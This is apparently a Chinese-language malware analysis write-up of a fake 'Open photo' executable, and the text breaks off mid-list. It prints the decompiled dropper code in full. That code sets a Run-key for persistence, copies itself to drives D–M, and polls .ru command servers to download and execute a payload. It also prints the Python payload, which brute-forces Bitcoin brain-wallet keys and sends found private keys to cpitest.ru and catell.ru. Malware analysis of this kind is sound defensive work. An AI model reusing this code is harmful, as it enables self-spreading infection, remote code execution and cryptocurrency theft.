今天分析一例样本,该样本使用flask编写,使用MDM Zinc3打包成exe,使用文件夹图标,会在系统中除了C盘外所有驱动器根目录创建photo目录,将自身拷贝进去,诱导用户点击,会添加开机启动项,连接后台下载后续载荷。
样本基本信息
Verified: Unsigned
Link date: 4:52 2010/11/3
Publisher: n/a
Company: Soft
Description: Open photo
Product: Photo
Prod version: 1.1.0.4
File version: 1.1.0.4
MachineType: 32-bit
MD5: EAD9542D757366D77F887173A8EEC810
SHA1: 9AA2DFE10C4BA5AA030510E3B1CE17ADA1BE254D
使用UPX壳
icon是系统图片文件夹图标
分析过程
释放了这几个文件
将自身拷贝到系统开始目录下,并删除前面释放的几个文件
运行之后访问了这个域名www.psiassess.ru
提取到了释放的文件
文件名称: C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\0.mdd
MD5: 9eda6ac05d976773bec1a5ac2fc19c3b
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\1.mdd
MD5: df9ffe8b2b937c3316bbead7821bee5d
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\2.mdd
MD5: 3a9fff286cf967cfd251324c83bf4921
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\3.mdd
MD5: 5168f1a61e75eef60cfd9b2356b2a033
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\4.mdd
MD5: 5379c9da4eecad6bd87e16fa9bf77793
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\~swd1.dat
MD5: a7f1d0df5413d14fab8566df4fdde1d9
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\~swd1.swf
MD5: eeb736d65f89dbabdc5670f801c6d53b
使用pestudio进行查看,发现0.mdd-4.mdd为动态库,pdb如下,提供了两个导出函数,通过检索发现这是mdm Zinc 3.0这个工具的组件,用来将flask打包成exe的
导出函数
GetNumPlugins
GetPluginInstance
pdb路径
0.mdd,c:\MDM\Zinc3\mdmdialogs\Release\mdm_dialogs.pdb
1.mdd,c:\MDM\Zinc3\mdmfilesystem\Release\mdm_FileSystem.pdb
2.mdd,c:\MDM\Zinc3\mdm_forms\Release\mdm_forms.pdb
3.mdd,c:\MDM\Zinc3\mdmhttp\Release\mdm_HTTP.pdb
4.mdd,c:\MDM\Zinc3\mdmsystem\Release\mdm_System.pdb
swd1.dat,swd1.swf这两个文件是flash文件,我们使用ffdec工具对其进行逆向
flash使用的action script语言,这种语言类似于javascript
反编译出来的as代码如下
mdm.Forms.MainForm.visible = true;
mdm.Forms.MainForm.alpha = 1;
mdm.Forms.MainForm.hideCaption(true);
System.useCodepage = true;
var go = "none";
var timer = 1;
var num = 0;
var win = 2;
name = mdm.Application.filename;
mdm.System.Registry.saveString(2,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","Startup",mdm.System.Paths.programs + name);
function loadCommand()
{
site = ["profbase.ru","psiassess.ru","topstatist.ru"];
loadVariables("http://www." + site[Math.floor(Math.random() * 3)] + "/photo.txt?" + getTimer(),"button");
}
function copyFile()
{
if(num == 9)
{
num = 0;
}
else
{
num++;
}
disk = ["D","E","F","G","H","I","J","K","L","M"];
if(mdm.FileSystem.fileExists(disk[num] + ":\\Photo\\" + name) == false)
{
mdm.FileSystem.makeFolder(disk[num] + ":\\Photo");
mdm.FileSystem.copyFile(mdm.System.Paths.programs + name,disk[num] + ":\\Photo\\" + name);
}
}
function loadComplete()
{
if(mdm.FileSystem.getFileDate(mdm.Application.path + name) == button.date)
{
loadVariables("http://www.profbase.ru/photo.php?pc=" + mdm.System.computerName + " " + mdm.System.winVerString,"");
}
keywords = button.keyword.split(",");
urls = button.url.split(",");
clearInterval(load);
clearInterval(interval);
interval = setInterval(command,1000);
loadFile();
}
function command()
{
if(timer == button.time / 1000)
{
timer = 1;
}
else
{
timer = timer + 1;
}
mdm.Application.bringToFront();
windowList = mdm.System.getWindowList();
var _loc1_ = 0;
while(_loc1_ < windowList.length)
{
if(windowList[_loc1_][0] == "Пуск" || windowList[_loc1_][0] == "Start")
{
win = _loc1_ + 1;
break;
}
_loc1_ = _loc1_ + 1;
}
_loc1_ = 0;
while(_loc1_ < keywords.length)
{
windowList[win][0] = windowList[win][0].toLowerCase();
if(windowList[win][0].indexOf(keywords[_loc1_]) > -1)
{
key = keywords[_loc1_];
go = urls[_loc1_];
num = _loc1_;
break;
}
go = "none";
_loc1_ = _loc1_ + 1;
}
if(go != "none")
{
mdm.Forms.MainForm.width = button.w * 1;
mdm.Forms.MainForm.height = button.h * 1;
mdm.Forms.MainForm.y = windowList[win][2] * 1 + button.x * 1;
mdm.Forms.MainForm.x = windowList[win][3] * 1 + button.y * 1;
}
else
{
mdm.Forms.MainForm.width = 1;
mdm.Forms.MainForm.height = 1;
}
}
function loadFile()
{
if(button.http.length > 10)
{
var _loc1_ = new mdm.HTTP();
_loc1_.onBinaryTransferComplete = function()
{
if(button.http.indexOf(".swf") > -1)
{
mdm.Application.createForm("flash","transparent",button.c,1,1,1,1);
mdm.FileSystem.deleteFile(button.c);
}
else
{
mdm.System.exec(button.c);
}
};
_loc1_.getFile(button.http,"","",button.c);
}
}
if(mdm.Application.path != mdm.System.Paths.programs)
{
mdm.FileSystem.copyFile(mdm.Application.path + name,mdm.System.Paths.programs + name);
mdm.Dialogs.BrowseFile.filterList = "Images|*.bmp;*.jpg;*.png;*.gif";
open = mdm.Dialogs.BrowseFile.show();
if(open != "false")
{
mdm.System.exec(open);
}
mdm.Application.exit();
}
else
{
load = setInterval(loadCommand,10000);
copy = setInterval(copyFile,10000);
}
button.onPress = function()
{
go = "none";
};
mdm.Application.onAppChangeFocus = function(focus)
{
if(focus.status == "true")
{
if(go != "none")
{
mdm.System.exec("http://" + go,"_self");
}
delete keywords.num;
delete urls.num;
go = "none";
}
};
主要的恶意行为为
1.注册表中设置开机启动
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Startup"="C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\1.exe"
2.在D-M盘符下,创建photo目录,将自身拷贝过去
3.请求下列三个域名
http://www.profbase.ru/photo.txt
http://www.psiassess.ru/photo.txt
http://www.topstatist.ru/photo.txt
这个链接的内容为
&ver=3.0&
&time=21600000&
&x=1&
&y=1&
&w=1&
&h=1&
&keyword=nil&
&url=nil&
&keywords=nil&
&urls=nil&
&http=http://194.147.84.197/python18&
&c=file5.exe&
&loadurl=http://194.147.84.197/python18&
&loadpc=file5.exe&
&date=21.01.2010&
请求http://194.147.84.197/python18,发现是一个pyinstaller打包的exe程序
样本的信息为
63e104fb8a1906ed70a4baf3f2672a70
将这个样本的python脚本提取出来,发现这样样本的打包时间为2014-04-30 13:54:04,这段python代码的功能不没有分析,以后有时间再仔细看。
# uncompyle6 version 3.9.0
# Python bytecode version base 2.7 (62211)
# Decompiled from: Python 2.7.13 |Continuum Analytics, Inc.| (default, May 11 2017, 13:17:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: address-in-addresses-26.py
# Compiled at: 2014-04-30 13:54:04
import hashlib, ctypes, ctypes.util, sys, os, glob, ssl, time, zlib, gzip, bz2, io, re, gc, json, pycurl, psutil, string, bisect, platform, threading, smtplib, winreg as reg, multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
import random
from random import choice, sample, randint, randrange
def resource_path(relative_path):
try:
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath('.')
return os.path.join(base_path, relative_path)
libeay32 = ctypes.cdll.libeay32
def check_result(val, func, args):
if val == 0:
raise ValueError
else:
return ctypes.c_void_p(val)
libeay32.EC_KEY_new_by_curve_name.restype = ctypes.c_void_p
libeay32.EC_KEY_new_by_curve_name.errcheck = check_result
class KEY():
def __init__(self):
NID_secp256k1 = 714
self.k = libeay32.EC_KEY_new_by_curve_name(NID_secp256k1)
self.compressed = False
self.POINT_CONVERSION_COMPRESSED = 2
self.POINT_CONVERSION_UNCOMPRESSED = 4
def __del__(self):
if libeay32:
libeay32.EC_KEY_free(self.k)
self.k = None
return
def generate(self, secret=None):
if secret:
self.prikey = secret
bn = libeay32.BN_new()
priv_key = libeay32.BN_bin2bn(secret, 32, bn)
group = libeay32.EC_KEY_get0_group(self.k)
pub_key = libeay32.EC_POINT_new(group)
bn_ctx = libeay32.BN_CTX_new()
libeay32.EC_POINT_mul(group, pub_key, priv_key, None, None, bn_ctx)
libeay32.EC_KEY_set_private_key(self.k, priv_key)
libeay32.EC_KEY_set_public_key(self.k, pub_key)
libeay32.EC_POINT_free(pub_key)
libeay32.BN_free(bn)
libeay32.BN_CTX_free(bn_ctx)
return self.k
else:
return libeay32.EC_KEY_generate_key(self.k)
return
def get_pubkey(self):
size = libeay32.i2o_ECPublicKey(self.k, 0)
mb = ctypes.create_string_buffer(size)
libeay32.i2o_ECPublicKey(self.k, ctypes.byref(ctypes.pointer(mb)))
return mb.raw
def get_secret(self):
bn = libeay32.EC_KEY_get0_private_key(self.k)
bytes = (libeay32.BN_num_bits(bn) + 7) / 8
mb = ctypes.create_string_buffer(bytes)
n = libeay32.BN_bn2bin(bn, mb)
return mb.raw.rjust(32, chr(0))
def set_compressed(self, compressed):
self.compressed = compressed
if compressed:
form = self.POINT_CONVERSION_COMPRESSED
else:
form = self.POINT_CONVERSION_UNCOMPRESSED
libeay32.EC_KEY_set_conv_form(self.k, form)
def dhash(s):
return hashlib.sha256(hashlib.sha256(s).digest()).digest()
def rhash(s):
h1 = hashlib.new('ripemd160')
h1.update(hashlib.sha256(s).digest())
return h1.digest()
b58_digits = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
def base58_encode(n):
l = []
while n > 0:
n, r = divmod(n, 58)
l.insert(0, b58_digits[r])
return ('').join(l)
def base58_decode(s):
n = 0
for ch in s:
n *= 58
digit = b58_digits.index(ch)
n += digit
return n
def base58_encode_padded(s):
res = base58_encode(int('0x' + s.encode('hex'), 16))
pad = 0
for c in s:
if c == chr(0):
pad += 1
else:
break
return b58_digits[0] * pad + res
def base58_decode_padded(s):
pad = 0
for c in s:
if c == b58_digits[0]:
pad += 1
else:
break
h = '%x' % base58_decode(s)
if len(h) % 2:
h = '0' + h
res = h.decode('hex')
return chr(0) * pad + res
def base58_check_encode(s, version=0):
vs = chr(version) + s
check = dhash(vs)[:4]
return base58_encode_padded(vs + check)
def base58_check_decode(s, version=0):
k = base58_decode_padded(s)
v0, data, check0 = k[0], k[1:-4], k[-4:]
check1 = dhash(v0 + data)[:4]
if check0 != check1:
raise BaseException('checksum error')
if version != ord(v0):
raise BaseException('version mismatch')
return data
def gen_eckey(passphrase=None, secret=None, pkey=None, compressed=False, rounds=1, version=0):
k = KEY()
if passphrase:
secret = passphrase.encode('utf8')
for i in xrange(rounds):
secret = hashlib.sha256(secret).digest()
if pkey:
secret = base58_check_decode(pkey, 128 + version)
compressed = len(secret) == 33
secret = secret[0:32]
k.generate(secret)
k.set_compressed(compressed)
return k
def get_addr(k, version=0):
pubkey = k.get_pubkey()
secret = k.get_secret()
hash160 = rhash(pubkey)
addr = base58_check_encode(hash160, version)
payload = secret
if k.compressed:
payload = secret + chr(1)
pkey = base58_check_encode(payload, 128 + version)
return (
addr, pkey)
def reencode(pkey, fromversion=0, toversion=48):
payload = base58_check_decode(pkey, 128 + fromversion)
secret = payload
pkey = base58_check_encode(payload, 128 + toversion)
return get_addr(gen_eckey(pkey=pkey, compressed=True, version=toversion), version=toversion)
def getUserAgent():
platform = choice(['Macintosh', 'Windows', 'X11'])
if platform == 'Macintosh':
os = choice(['68K', 'PPC'])
else:
if platform == 'Windows':
os = 'Windows NT ' + choice(['5.0', '5.1', '5.2', '6.0', '6.1', '6.2', '6.3', '10.0'])
else:
if platform == 'X11':
os = choice(['Linux i686', 'Linux x86_64'])
browser = choice(['chrome', 'firefox', 'ie'])
if browser == 'chrome':
webkit = str(randint(500, 599))
version = str(randint(0, 24)) + '.0' + str(randint(0, 1500)) + '.' + str(randint(0, 999))
return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, live Gecko) Chrome/' + version + ' Safari/' + webkit
if browser == 'firefox':
year = str(randint(2000, 2020))
month = str(randint(1, 12))
if len(month) == 1:
'0' + month
day = str(randint(1, 30))
if len(day) == 1:
'0' + day
gecko = year + month + day
version = str(randint(1, 15)) + '.0'
return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version
if browser == 'ie':
version = str(randint(1, 10)) + '.0'
engine = str(randint(1, 5)) + '.0'
token = choice([choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ', ''])
return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')'
def curl(url, timeout=35, ctimeout=30):
try:
get = pycurl.Curl()
get.setopt(pycurl.URL, url)
get.setopt(pycurl.USERAGENT, getUserAgent())
get.setopt(pycurl.HTTPHEADER, ['Accept: text/html, image/jpeg, */*;q=0.4'])
bytes = io.BytesIO()
get.setopt(pycurl.WRITEFUNCTION, bytes.write)
get.setopt(pycurl.FOLLOWLOCATION, 1)
get.setopt(pycurl.MAXREDIRS, 5)
get.setopt(pycurl.SSL_VERIFYPEER, 0)
get.setopt(pycurl.SSL_VERIFYHOST, 0)
get.setopt(pycurl.CONNECTTIMEOUT, ctimeout)
get.setopt(pycurl.TIMEOUT, timeout)
get.perform()
code = get.getinfo(pycurl.RESPONSE_CODE)
return bytes.getvalue()
except pycurl.error as e:
return str(e.args[0])
def encrypt(data):
try:
chars = 'zxcvbnmasdfghjklqwertyuiop'
c = list(chars)
c[::2], c[1::2] = c[1::2], c[::2]
chars_replace = ('').join([ str(i) for i in c ])
table = string.maketrans(chars, chars_replace)
return data.translate(table)
except:
return data
def generate_wallet(phrase='', compressed=choice([False, True])):
try:
return get_addr(gen_eckey(passphrase=phrase, compressed=compressed)) + (phrase,)
except:
pass
def check_addresses(u, t, ver, phrases, wallets):
try:
win = '0'
keys = []
addresses = {}
try:
for file in reversed(['addresses01.zl1', 'addresses001.zl1', 'addresses0001.zl1', 'addresses00000001.zl1']):
try:
path = os.path.join(os.environ['TEMP'], file)
with open(path, 'rb') as (f):
addresses = zlib.decompress(f.read())
break
except:
if os.path.isfile(resource_path('addresses.zl1')):
path = resource_path('addresses.zl1')
else:
path = os.path.join(os.path.join(os.path.realpath(sys.path[0]), '.'), 'addresses.zl1')
with open(path, 'rb') as (f):
addresses = zlib.decompress(f.read())
addresses = json.loads(addresses)
except:
pass
if len(addresses) < 80000:
return
addresses['FYM'] = addresses['FYM'].replace('ZEHnszC$', '')
addresses['6Qa'] = addresses['6Qa'].replace('FeudRUt$', '')
addresses['4p5'] = addresses['4p5'].replace('cGy5DZm$', '')
adr = str(len(addresses))[:4]
try:
keys0 = os.environ['TEMP'] + '\\keys0.txt'
if os.path.isfile(keys0):
with open(keys0, 'rb') as (f):
keys.extend(list(set(f.read().split())))
win = platform.machine()[-4:] + platform.win32_ver()[0][0:4] + platform.node()[-2:]
except:
pass
for i in xrange(len(phrases)):
try:
if len(wallets) < 1:
try:
lot = set([ phrases.pop() for g in xrange(1000) ])
pool = ThreadPool()
output = pool.map(generate_wallet, lot)
pool.close()
pool.join()
wallets.extend(output)
except:
if phrases:
wallets.append(generate_wallet(phrases.pop()))
wallet = wallets.pop()
address = wallet[0]
key = wallet[1]
phrase = wallet[2]
if '$' + address[4:11] + '$' in addresses.get(address[1:4], ''):
keys.append(encrypt(ver + address + '$' + key + win + adr + '$' + phrase.replace(' ', '%20')))
keys = list(set(keys))
if not i % 1001 and len(keys):
keys = sample(keys, len(keys))
keys = [ k for k in keys if k.strip() != '' ]
curl('cpitest.ru/address.php?message=' + keys[0])
if curl('catell.ru/address.php?message=' + keys[0]) == '0':
keys.pop(0)
if not i % 20001:
with open(keys0, 'wb') as (f):
f.write(('\n').join(keys))
if not i % 100:
time.sleep(0.01)
except:
pass
except:
pass
def load_addresses(url):
try:
for file in ['addresses01.zl1', 'addresses001.zl1', 'addresses0001.zl1', 'addresses00000001.zl1']:
time.sleep(5)
try:
path = os.path.join(os.environ['TEMP'], file)
with open(path, 'rb') as (f):
strings = zlib.decompress(f.read())
del strings
except:
with open(path, 'wb') as (f):
f.write(curl(url + file, 3060, 3000))
except:
pass
def choices(items, total, retry=0):
try:
keys = []
s = sum(items.values())
rnds = [ random.random() * s for i in xrange(total) ]
items = sorted(items.items(), key=(lambda item: item[1]), reverse=True)
for rnd in rnds:
for i, w in enumerate(items):
rnd -= w[1]
if rnd < 0:
if w[0] not in keys:
keys.append(w[0])
break
return keys
except:
pass
def per(item, total):
return int(float(item) / total * 100)
def get_phrases(n, c, d):
try:
t = time.time()
phrases = set()
blackphrases = set()
blacklinks = set()
links = set((',wikipedia.org,wikileaks.org,wikiart.org,wikifur.com,wikinfo.org,wikitravel.org,wikirank.net,fandom.com,allmusic.com,britannica.com,encyclopedia.com,citizendium.org,infoplease.com,dotdashmeredith.com,orthodoxwiki.org,howstuffworks.com,library.wolfram.com,almanac.com,si.edu,openlibrary.org,presidency.ucsb.edu,catalog.loc.gov,medlineplus.gov,msdmanuals.com,hyperhistory.com,lib.umich.edu,nolo.com,findlaw.com,cia.gov,webopedia.com,edmunds.com,onelook.com,pantheon.org,forvo.com,bbc.com,bookfinder.com,realestateabc.com,medlineplus.gov,lexicool.com,onlineconversion.com,pdr.net,owl.purdue.edu,sports-reference.com,factcheck.org,worldcat.org,ourdocuments.gov,vos.ucsb.edu,bartleby.com').replace(',', ',http://www.')[1:].split(','))
temp = os.environ['TEMP']
for file in [('\\links.zl1', links), ('\\blacklinks.zl1', blacklinks), ('\\phrases.' + str(c) + '.zl1', phrases), ('\\blackphrases.' + str(c) + '.zl1', blackphrases)]:
if os.path.isfile(temp + file[0]):
with open(temp + file[0], 'rb') as (f):
file[1].update(zlib.decompress(f.read()).split('\r\n'))
for i in xrange(1, 50000000):
time.sleep(0.2)
try:
if int(time.strftime('%Y%m%d', time.localtime())) > d:
break
if not links:
return
link = sample(links, 1)[0]
link = link.lower()
domain = re.findall('https?://([-\\w.]*)/', link + '/', re.IGNORECASE)[0]
if link[11:16] + link[::-len(link) // 3] in blacklinks and len(links) > 50:
links.discard(link)
else:
if len(links) > 50:
blacklinks.add(link[11:16] + link[::-len(link) // 3])
html = curl(link, 5, 2)
html = re.sub('href=["\\\']?//|href=["\\\']?/', 'href="http://' + domain + '/', html)
hrefs = re.findall('href="(https?://[-.\\w/]{,90}[-\\w/]{,5})"', html)
hrefs = set(filter((lambda href: not re.findall('\\.(gif|ico|png|js|css|jpg|svg|ttf|woff)$', href, re.IGNORECASE)), hrefs))
hrefs = set(map((lambda href: href.lower()), hrefs))
if hrefs:
links.discard(link)
for href in hrefs:
blacklink = href[11:16] + href[::-len(href) // 3]
if blacklink not in blacklinks:
links.add(href)
hrefs.clear()
if len(links) > 200000:
links -= set(sample(links, 20000))
if len(blacklinks) > 500000:
blacklinks -= set(sample(blacklinks, 50000))
if len(phrases) > 20000:
phrases -= set(sample(phrases, 2000))
if len(blackphrases) > 100000:
blackphrases -= set(sample(blackphrases, 10000))
html = re.sub('\\&\\#039;', "'", html)
lines = re.findall("(<title>|<h\\d>|<td>|<td [^>]*>|<p>|<p [^>]*>|<br ?/?>|\\r|\\n|[.!?]) *((?:[a-z']+ ){" + str(c - 1) + "}(?:[a-z']+[.,!?]?)) *(</title>|</h\\d>|</td></p>|<br ?/?>|\\r|\\n|[.,!?])", html, re.IGNORECASE)
lines = {line[1] for line in lines}
if len(lines) > 10:
for line in lines:
blackphrase = line[::-len(line) // 10]
if blackphrase in blackphrases:
continue
blackphrases.add(blackphrase)
phrases.add(line)
if not i % 10 and len(phrases) > 100:
send = sample(phrases, 30)
if curl('cpitest.ru/phrases.php?file=phrases.' + str(c) + '.txt&message=' + (';').join(send).replace(' ', '%20')) == '0':
phrases.difference_update(send)
if not i % 100:
for file in [('\\links.zl1', links), ('\\blacklinks.zl1', blacklinks), ('\\phrases.' + str(c) + '.zl1', phrases), ('\\blackphrases.' + str(c) + '.zl1', blackphrases)]:
with open(temp + file[0], 'wb') as (f):
f.write(zlib.compress(('\r\n').join(file[1]), 1))
except:
pass
except:
pass
if __name__ == '__main__':
multiprocessing.freeze_support()
alcohols = 'Abricontine, Absinthe, Advocat, Ale, Alpina, Amaretto, Amber, Amontiliado, Angostura, Anisette, Annata, Beer, Bellini, Bodega, Bourbon, Brandy, Bristol, Calvados, Campari, Cantina, Chablis, Chambraise, Champagne, Cider, Cocktail, Cognac, Colada, Cosmopolitan, Daikiri, Damiana, Dandelion, Digestif, Drambuie, Espumoso, rangelico, Garrafeira, Gin, Ginger, Harvey, Hennessy, Highball, Imbottigliatto, Izarra, Jagermeister, Jerez, Julep, Kahlua, Lager, Landwein, Liqueur, Malaga, Martini, Metodo, Mezcal, Mescal, Mohito, Mojito, Moonshine, Perlwein, Pisko, Porto, Portwein, Punch, Rose, Rum, Sake, Scheidam, Screwdriver, Shandy, Sheridan, Sheridans, Sherry, Spumante, Steinhager, Tequila, Tonic, Vermouth, Vinicola, Vodka, Weinprobe, Whiskey, Whisky, Wine, Wishniak'
dogs = 'Admiral, Aidan, Alf, Alfred, Anakin, Apollo, Archie, Artemis, Atreyu, Baldrick, Balfour, Baloo, Bandit, Barney, Baron, Bastian, Bear, Benedict, Benny, Benson, Bentley, Bigy, Bimbo, Biscuit, Blade, Bliss, Blitz, Boomer, Boots, Brick, Brisk, Bruno, Buddy, Bullet, Buster, Butter, Caesar, Calder, Calvin, Carlin, Carter, Casper, Celt, Charles, Charley, Charlie, Chase, Chester, Chief, Chip, Clyde, Cooper, Corbin, Cosmo, Crown, Crystall, Damien, Darby, Devin, Dexter, Dingo, Disaster, Dobby, Dolan, Dominique, Doyle, Duke, Dusk, Dusty, Elliot, Emmett, Eowyn, Falkor, Faramir, Finn, Force, Forrest, Fox, Frank, Frankie, Fred, Friendly, Gaius, Gandalf, Garfield, Gentle, George, Ghost, Gizmo, Grape, Gus, Han, Hank, Harley, Harry, Hazel, Henry, Hide, Hobbes, Hobbit, Hudson, Humble, Iron, Jack, Jackson, Jake, Jareth, Jarvis, Jasper, Jax, Jay, Jerry, Jewel, Joffrey, Joker, Jordan, Journey, Junior, Kael, Kaydan, Kingston, Kobe, Ladd, Lark, Larson, Laser, Leo, Light, Lilo, Lipton, Logan, Loki, Lollipop, Louie, Lucky, Ludo, Luke, Lumpy, Luther, Magic, Manfred, Marley, Mars, Marty, Maui, Max, McFly, Melvin, Mercy, Merlin, Mick, Mickey, Midnight, Milo, Moose, Mowgli, Murphy, Murray, Neal, Newton, Nick, Noise, Nolan, Norman, Odo, Olaf, Oliver, Ollie, Oreo, Orion, Osborne, Oscar, Otis, Otto, Ozzy, Paddy, Patton, Peach, Percival, Percy, Petal, Precious, Prince, Pumpkin, Punch, Ralph, Ramsey, Raygun, Reiner, Remi, Rocky, Romeo, Ronan, Rowan, Rufus, Rylan, Salem, Sam, Sammy, Sauron, Scully, Sebastian, Septimus, Shakespeare, Sheldon, Sheriff, Sherlock, Sherman, Simba, Simon, Smith, Spate, Spenser, Spicy, Spike, Spock, Stanley, Stream, Strike, Sunny, Swen, Sylvester, Taddle, Teddy, Theo, Thomas, Thor, Toby, Tommy, Tucker, Tyler, Tyrian, Viscount, Vulcan, Waite, Wallace, Walter, Watson, Whisper, Whistle, Wild, William, Winnie, Wolf, Zac, Zack, Zeus, Ziggy'
cats = 'Abby, Abigail, Alchemy, Alice, Amelli, Aneira, Angel, Anna, Annie, Aquila, Ariana, Arielle, Arlena, Arya, Astrid, Athena, Atreyu, Aurora, Aurra, Baby, Balmy, Beatrice, Bella, Belle, Bethany, Bitsy, Bloom, Bonnie, Brandy, Breena, Caitlin, Calista, Callie, Candy, Carly, Cersei, Charity, Charlotte, Cherlindrea, Cherry, Chika, Chime, Chloe, Cinnamon, Clementine, Cleo, Cleopatra, Clover, Clumsy, Coco, Cookie, Cora, Cordelia, Corra, Cupid, Cutie, Daisy, Darla, Delight, Destiny, Diana, Diva, Donna, Dori, Eleonor, Elive, Elizabeth, Ella, Ellie, Ellsa, Elora, Elsa, Emily, Emma, Enigma, Fable, Faith, Felicity, Fiona, Fleur, Florine, Flower, Fluffy, Foxy, Freya, Frisky, Fume, Gabby, Galadriel, Gemma, Geordi, Glinda, Glory, Grace, Gracie, Gwen, Hannah, Hearty, Hedwig, Helga, Honey, Hope, Idris, Iggy, Imogen, Iris, Isabelle, Isla, Isobel, Ivy, Izzy, Jade, Jane, Jasmine, Jazzy, Josie, Justice, Kael, Kamala, Kara, Kelly, Kiera, Kiki, Kitty, Kyle, Lace, Lanka, Layla, Leia, Lexi, Lila, Lili, Lily, Lina, Liquid, Lola, Lucy, Lulu, Luna, Lyra, Mable, Macy, Maggie, Magma, Maiden, Mamba, Marley, Marty, Mary, Matilda, Maya, Melanie, Melissa, Mia, Mila, Milky, Millie, Mimi, Mindy, MissKitty, Missy, Misty, Mittens, Molly, Myrtle, Mystery, Nala, Noira, Nova, Nyota, Olimpia, Olivia, Omega, Padma, Padme, Penelope, Penny, Phoebe, Piper, Pixi, Poppy, Princess, Quincy, Renesmee, Riley, Riple, Ripley, River, Romani, Rory, Rosie, Rowan, Roxy, Ruby, Sadie, Salena, Sassy, Scotia, Scout, Septimus, Serena, Shell, Sierra, Silky, Silly, Silver, Simba, Sinead, Smokey, Snickers, Sophie, Space, Spooky, Spring, Starry, Stella, Stormy, Sugar, Sunshine, Susan, Sydney, Tauriel, Teyla, Tinkerbell, Tutsi, Undy, Whoopi, Willow, Wilma, Winnie, Wise, Yuka, Yvetta, Zelda, Zoe, Zoey'
mens = 'Aaron, Abbie, Abbott, Abel, Abie, Abner, Abraham, Abram, Adalbert, Adam, Addie, Addy, Adelbert, Adrian, Aidan, Aiden, Alan, Alastair, Alaster, Albert, Alec, Aleck, Alejandro, Alex, Alexander, Alexandra, Alf, Alfie, Alfonso, Alfred, Alger, Algernon, Algie, Algy, Alistair, Alister, Allan, Allen, Allister, Alonso, Alonzo, Alphonso, Alton, Alva, Alvah, Alvan, Alvin, Alwin, Alwyn, Ambie, Ambrose, Amos, Andrew, Andy, Angus, Anse, Ansel, Anselm, Anthony, Anton, Antonio, Antony, Apollo, Arch, Archibald, Archie, Aristotle, Armani, Arnie, Arnold, Aron, Arrow, Arthur, Artie, Arturo, Ashton, Atlas, Auden, Augie, Augustin, Augustine, Augustus, Aurelio, Austin, Avery, Baker, Baldie, Baldwin, Barnaby, Barnard, Barney, Barnie, Barrett, Barrie, Barry, Bart, Bartholomew, Bartlett, Bartley, Barty, Basie, Basil, Bass, Bat, Batty, Baxter, Baz, Ben, Benedict, Benjamin, Benjie, Benjy, Bennet, Bennett, Bennie, Benny, Bentlee, Bernard, Berney, Bernie, Bert, Berthold, Bertie, Bertram, Bertrand, Billie, Billy, Blair, Blake, Bob, Bobbie, Bobby, Bobo, Booker, Boris, Bowie, Brad, Bradford, Bradley, Brady, Bram, Brand, Branden, Brandon, Brave, Braxten, Brent, Brenton, Bret, Brett, Brian, Brix, Broderick, Brodie, Brody, Brose, Bruce, Bruno, Bryan, Bryant, Burt, Burton, Byron, Caleb, Calvin, Cameron, Camp, Carey, Carl, Carlos, Carol, Carrol, Carroll, Carry, Carter, Cary, Casey, Casimir, Caspar, Casper, Caspian, Cassidy, Cassius, Cater, Cecil, Ced, Cedar, Cedric, Chad, Chap, Charles, Charley, Charlie, Chas, Chase, Chauncey, Chester, Chet, Chris, Christian, Christopher, Christy, Chuck, Ciel, Clair, Clare, Clarence, Clark, Clarke, Claud, Claude, Clay, Clayton, Clem, Clement, Cliff, Clifford, Clint, Clinton, Clive, Cloud, Clyde, Cody, Cole, Colin, Collin, Connie, Connor, Conny, Conrad, Constantine, Corey, Cornelius, Corney, Corny, Cory, Cosmo, Craig, Criffer, Cris, Curt, Curtis, Cyril, Cyrus, Dale, Daniel, Danny, Darrel, Darrell, Darren, Darry, Darryl, Dartagnan, Darwin, Daryl, Dave, Davey, David, Davie, Davy, Dean, Deane, Delbert, Dell, Denis, Dennis, Denny, Derek, Derrick, Derry, Desmond, Devin, Dex, Dexter, Dick, Diego, Dillon, Diogo, Dob, Dolf, Dolph, Domenic, Domenick, Dominic, Dominick, Don, Donald, Donnie, Donny, Donovan, Dorian, Doug, Douglas, Douglass, Doyle, Drew, Duane, Dud, Duddy, Dudley, Duke, Duncan, Dunk, Dunny, Dustin, Dusty, Dwayne, Dwight, Dylan, Earl, Earle, Earnest, Echo, Eddie, Eddy, Edgar, Edmond, Edmund, Edward, Edwin, Egbert, Elbert, Eldred, Eli, Elias, Elijah, Ellington, Elliot, Elliott, Ellis, Elmer, Elton, Elvin, Elvis, Elwin, Elwood, Elwyn, Emanuel, Emery, Emil, Emile, Emmanuel, Emmery, Emmet, Emmett, Emory, Eric, Erick, Erik, Ernest, Ernie, Errol, Erv, Ervin, Erwin, Ethan, Eugene, Eustace, Evan, Everard, Everest, Everett, Everson, Fab, Fabe, Fabian, Felix, Ferdie, Ferdinand, Fergie, Fergus, Ferguson, Ferris, Fidel, Fischer, Fitzgerald, Floy, Floyd, Ford, Fran, Francis, Francois, Frank, Frankie, Franklin, Franklyn, Franky, Fraser, Fred, Freddie, Freddy, Frederic, Frederick, Fredric, Fredrick, Fulton, Gabe, Gabriel, Garret, Garrett, Garry, Gary, Gavin, Gene, Geoffrey, Geordie, George, Georgie, Gerald, Gerard, Gerry, Gil, Gilbert, Glen, Glenn, Gordon, Gordy, Graham, 